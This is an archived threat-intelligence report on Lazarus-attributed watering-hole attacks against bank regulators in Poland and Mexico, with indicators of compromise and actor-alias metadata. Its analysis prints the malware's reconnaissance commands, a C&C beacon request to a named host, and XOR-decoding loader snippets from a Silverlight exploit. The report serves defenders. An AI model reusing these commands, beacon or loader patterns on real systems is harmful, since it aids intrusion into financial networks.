{ "id": "e6d92424-d845-4f29-938a-6d177af5ac88", "created_at": "2026-04-06T00:20:53.941073Z", "updated_at": "2026-04-10T03:38:19.431952Z", "deleted_at": null, "sha1_hash": "9c15bcff4c9310fe201beb9415deac58b1c80b24", "title": "Lazarus \u0026 Watering-hole attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 272672, "plain_text": "Lazarus \u0026 Watering-hole attacks\r\nArchived: 2026-04-02 10:45:33 UTC\r\nOn 3rd February 2017, researchers at badcyber.com released an article that detailed a series of attacks directed at\r\nPolish financial institutions. The article is brief, but states that \"This is – by far – the most serious information\r\nsecurity incident we have seen in Poland\" followed by a claim that over 20 commercial banks had been confirmed\r\nas victims.\r\nThis report provides an outline of the attacks based on what was shared in the article, and our own additional\r\nfindings.\r\nANALYSIS\r\nAs stated in the blog, the attacks are suspected of originating from the website of the Polish Financial Supervision Authority\r\n(knf.gov[.]pl), shown below:\r\nFrom at least 2016-10-07 to late January the website code had been modified to cause visitors to download\r\nmalicious JavaScript files from the following locations:\r\nhxxp://sap.misapor[.]ch/vishop/view.jsp?pagenum=1\r\nhxxps://www.eye-watch[.]in/design/fancybox/Pnf.action\r\nBoth of these appear to be compromised domains given they are also hosting legitimate content and have done for\r\nsome time. The malicious JavaScript leads to the download of malware to the victim’s device.\r\nSome hashes of the backdoor have been provided in BadCyber's technical analysis:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 1 of 10\n\n85d316590edfb4212049c4490db08c4b\r\nc1364bbf63b3617b25b58209e4529d8c\r\n1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae\r\nThe C\u0026Cs given in the BadCyber analysis were the following IP addresses:\r\n125.214.195.17\r\n196.29.166.218\r\nLAZARUS MALWARE\r\nOnly one of the samples referenced by BadCyber is available in public malware repositories. At the moment we\r\ncannot verify that it originated from the watering-hole on the KNF website – but we have no reason to doubt this\r\neither.\r\nMD5 hash Filename File Info First seen Origin\r\n85d316590edfb4212049c4490db08c4b gpsvc.exe\r\nWin32\r\n(736 KB)\r\n2017-01-26\r\n07:46:24\r\nPL\r\nThe file is packed with a commercial packer known as 'Enigma Protector'. Once unpacked it drops a known\r\nmalware variant, which has been seen as part of the Lazarus group’s toolkit in other cases over the past year.\r\nThe unpacked executable takes several command line arguments:\r\n-l : list service names, available for its own registration\r\n-o : open specified event\r\n-t : set specified event\r\n-x [PASSWORD] -e [SERVICE_NAME] : drop/install DLL under specified [SERVICE_NAME]\r\n-x [PASSWORD] -f [SERVICE_NAME] : recreate the keys that keep the password for the next stage DLL, under the\r\nspecified [SERVICE_NAME]\r\nThe provided password's MD5 hash is used as an RC4 password. On top of that, there is one more RC4-round,\r\nusing a hard coded 32-byte RC4 password:\r\n53 87 F2 11 30 3D B5 52 AD C8 28 09 E0 52 60 D0 6C C5 68 E2 70 77 3C 8F 12 C0 7B 13 D7 B3 9F 15\r\nOnce the data is decrypted with two RC4 rounds, the dropper checks the decrypted data contains a valid 4-byte\r\nsignature: 0xBC0F1DAD .\r\nWATERING HOLE ANALYSIS\r\nThe attacker content on the compromised sap.misapor[.]ch site was not accessible at the time of writing.\r\nHowever, archived versions of some pages can be found:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 2 of 10\n\nhttp://web.archive[.]org/web/20170203175640/https://sap.misapor.ch/Default.html\nhttp://web.archive[.]org/web/20170203175641/https://sap.misapor.ch/Silverlight.js\nThe Default.html contains code to load MisaporPortalUI.xap – a Silverlight application which likely would\ncontain the malicious first-stage implant. This is unfortunately not available for analysis currently.\n\n[![Get Microsoft Silverlight](/web/20170203175640im_/http://go.microsoft.com/fwlink/?LinkId=108181)](/web/20170203175640/http://go.microsoft.com/fwlink/?LinkID=149156\u0026v=3.0.40624.0)\n\nADDITIONAL WATERING HOLES\nThe eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector\nwebsites. On 2016-11-08 we observed connections to the site referred from:\nhxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx\nThis is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of\nMexico), specifically the portion of their site that details sanctions made by the Mexican National Banking\nCommission. This organisation is the Mexican banking supervisor and the equivalent of Poland's KNF.\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\nPage 3 of 10\n\nIn this instance the site redirected to the following URL:\r\nhxxp://www.eye-watch[.]in/jscroll/images/images.jsp?pagenum=1\r\nAt the time of writing the compromise is no longer present and no archived versions of the page exist to show\r\nwhere the compromise was located.\r\nA further instance of the malicious code appears to have been present on a bank website in Uruguay around 2016-\r\n10-26 when a PCAP of browsing to the website was uploaded to VirusTotal.com.\r\nThis shows a GET request made to:\r\nFollowed shortly after by connections to:\r\nUnfortunately, the response was empty and it is not possible to assess what may have been delivered.\r\nADDITIONAL MALWARE AND EXPLOIT ACTIVITY\r\nThe compromised eye-watch[.]in domain has been associated with other malicious activity in recent months.\r\nBelow is a list of samples which have used the site:\r\nMD5 hash Filename File Info First seen Origin\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 4 of 10\n\n4cc10ab3f4ee6769e520694a10f611d5 cambio.xap\r\nZIP\r\n(73 KB)\r\n2016-10-07\r\n03:09:43\r\nJP\r\ncb52c013f7af0219d45953bae663c9a2 svchost.exe\r\nWin32 EXE\r\n(126 KB)\r\n2016-10-24\r\n12:10:33\r\nPL\r\n1f7897b041a812f96f1925138ea38c46 gpsvc.exe\r\nWin32 EXE\r\n(126 KB)\r\n2016-10-27\r\n14:29:58\r\nUY\r\n911de8d67af652a87415f8c0a30688b2 gpsvc.exe\r\nWin32 EXE\r\n(126 KB)\r\n2016-10-28\r\n11:50:15\r\nUS\r\n1507e7a741367745425e0530e23768e6 gpsvc.exe\r\nWin32 EXE\r\n(126 KB)\r\n2016-11-15\r\n18:20:34\r\nN/A\r\nThe last 4 samples can loosely be categorised as the same malware variant, however the first sample appears to be\r\na separate exploit (as detailed later).\r\nIt is worth noting that these samples were all compiled after the domain began being used alongside the\r\nknf.gov[.]pl watering-hole. Additionally, the samples uploaded from Poland and Uruguay match with the\r\nwatering-hole activity observed – suggesting this is all part of the same campaign.\r\nDespite this potential connection to the Poland bank compromises, the malware is not particularly advanced – for\r\nexample using basic operations to gather system information. The malware attempts to run a series of commands\r\nwith cmd.exe and then returns the result via the C\u0026C, eye-watch[.]in .\r\nThese commands are as follows:\r\ncmd.exe /c hostname\r\ncmd.exe /c whoami\r\ncmd.exe /c ver\r\ncmd.exe /c ipconfig -all\r\ncmd.exe /c ping www.google.com\r\ncmd.exe /c query user\r\ncmd.exe /c net user\r\ncmd.exe /c net view\r\ncmd.exe /c net view /domain\r\ncmd.exe /c reg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"\r\ncmd.exe /c tasklist /svc\r\ncmd.exe /c netstat -ano | find \"TCP\"\r\nAn example C\u0026C beacon is seen below:\r\nGET /design/dfbox/list.jsp?action=What\u0026u=10729854751740 HTTP/1.1\r\nConnection: Keep-Alive\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 5 of 10\n\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\r\nHost: www.eye-watch[.]in\r\nSILVERLIGHT XAP FILE\r\nThe cambio.xap archive sample (4cc10ab3f4ee6769e520694a10f611d5) does not use eye-watch[.]in as a C\u0026C\r\nchannel but instead was downloaded from the URL:\r\nhxxps://www.eye-watch[.]in/design/fancybox/include/cambio.xap\r\n'cambio' is Spanish for 'change'. The URL is similar to that noted in the BadCyber blog, and the use of an XAP\r\nfile matches what can be found in the Archive.org cache for the sap.misapor[.]ch site.\r\nXAP is a software package format used for Microsoft Silverlight applications.\r\nIt can be opened as a standard ZIP archive and contains the following files:\r\nAppManifest.xaml\r\nShell_siver.dll\r\nSystem.Xml.Linq.dll\r\nTogether they form a re-packaged exploit for Silverlight based on CVE-2016-0034 (MS16-006) – a Silverlight\r\nMemory Corruption vulnerability. The exploit has previously been used by several exploit kits including RIG and\r\nAngler to deliver multiple crimeware tools.\r\nThe Shell_siver.dll file contains a compile path:\r\nc:\\Users\\KKK\\Desktop\\Shell_siver\\Shell_siver\\obj\\Release\\Shell_siver.pdb\r\nInternally, the code of this DLL loads a 2nd stage library called binaryreader.Exploit – as seen below with the\r\nXOR-encoded string:\r\nbyte[] array = new byte[]\r\n{\r\n115,120,127,112,99,104,99,116,112,117,\r\n116,99,63,84,105,97,125,126,120,101\r\n};\r\nthis.InitializeComponent();\r\nfor (int i = 0; i \u003c array.Length; i++)\r\n{\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 6 of 10\n\narray[i] ^= 17;\r\n}\r\nif (args.get_InitParams().get_Keys().Contains(\"shell32\"))\r\n{\r\n...\r\ntype.InvokeMember(\"run\", 256, null, obj, new object[])\r\n...\r\n}\r\nThis 2nd stage payload DLL contained within the assembly is 30,720 bytes in size and encoded with XOR 56:\r\nBuffer.BlockCopy(Resource1._1, 54, array, 0, 30720);\r\ntry\r\n{\r\nfor (int i = 0; i \u003c array.Length; i++)\r\n{\r\nbyte b = 56;\r\narray[i] ^= b;\r\n}\r\n...\r\n}\r\nOnce the payload stub is decoded, it represents itself as a PE-image, which is another .NET 4.0 assembly with the\r\ninternal name binaryreader.dll .\r\nThis second-stage DLL assembly, binaryreader.dll , is heavily obfuscated. The DLL (MD5 hash:\r\n7b4a8be258ecb191c4c519d7c486ed8a ) is identical to the one reported in a malware traffic analysis blog post from\r\nMarch 2016 where it was used to deliver Qbot. Thus it is likely the code comes from a criminal exploit kit which\r\nis being leveraged for delivery in this campaign.\r\nA similarly named cambio.swf (MD5 hash: 6dffcfa68433f886b2e88fd984b4995a ) was uploaded to VirusTotal\r\nfrom a US IP address in December 2016.\r\nIP WHITELISTS\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 7 of 10\n\nWhen examining the code on the exploit kit website a list of 255 IP address strings was found. The IPs only\r\ncontained the first 3 octets, and would have been used to filter traffic such that only IPs on that subnet would be\r\ndelivered the exploit and payload.\r\nThe IP addresses corresponded to a mix of public and private financial institutions spread across the globe:\r\nHowever, banks in some specific countries feature prominently in the list:\r\nRank Country Count\r\n1 Poland 19\r\n2 United States 15\r\n3 Mexico 9\r\n4 United Kingdom 7\r\n5 Chile 6\r\n6 Brazil 5\r\n7 Peru 3\r\n7 Colombia 3\r\n7 Denmark 3\r\n7 India 3\r\nThe prominence of Polish and Mexican banks matches the observation of watering-hole code on sites in both\r\ncountries.\r\nCONCLUSIONS\r\nThe evidence available is currently incomplete and at the moment we can only conclude the following:\r\n  •  There has been a series of watering hole attacks on bank supervisor websites in Poland \u0026 Mexico, and a\r\nstate owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 8 of 10\n\nmalware.\r\n  •   Investigators in Poland have identified known Lazarus group implants on bank networks and\r\nassociated this with the recent compromise of the Polish Financial Supervision Authority's website.\r\nThe technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank\r\nattack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor /\r\nstate-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves\r\nlittle operational benefit for infiltrating the wider banking sector.\r\nNonetheless, further evidence to connect together the pieces of this attack is needed, as well as insights into the\r\nend-goal of the culprits. We are continuing our analysis of new artefacts as they emerge and may issue further\r\nupdates in due course.\r\nRECOMMENDATIONS\r\nWe recommend organisations use the indicators provided in Appendix A to update their defensive systems to\r\nidentify attacks. For compromised legitimate websites we would suggest a minimum 1 month block be placed on\r\nthe domain. Patches against CVE-2016-0034 should be applied as soon as possible.\r\nAPPENDIX A - INDICATORS OF ATTACK\r\nC\u0026C IP address 125.214.195.17\r\n196.29.166.218\r\nCompromised site knf.gov[.]pl (currently clean)\r\nwww.cnbv.gob[.]mx (currently clean)\r\nbrou.com[.]uy (currently clean)\r\nsap.misapor[.]ch\r\nwww.eye-watch[.]in\r\nMD5 Hashes c1364bbf63b3617b25b58209e4529d8c\r\n85d316590edfb4212049c4490db08c4b\r\n1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae\r\n1507e7a741367745425e0530e23768e6\r\n911de8d67af652a87415f8c0a30688b2\r\n1f7897b041a812f96f1925138ea38c46\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 9 of 10\n\ncb52c013f7af0219d45953bae663c9a2\r\n4cc10ab3f4ee6769e520694a10f611d5\r\n7b4a8be258ecb191c4c519d7c486ed8a\r\nSource: https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" ], "report_names": [ "lazarus-watering-hole-attacks.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434853, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.pdf", "text": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.txt", "img": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.jpg" } }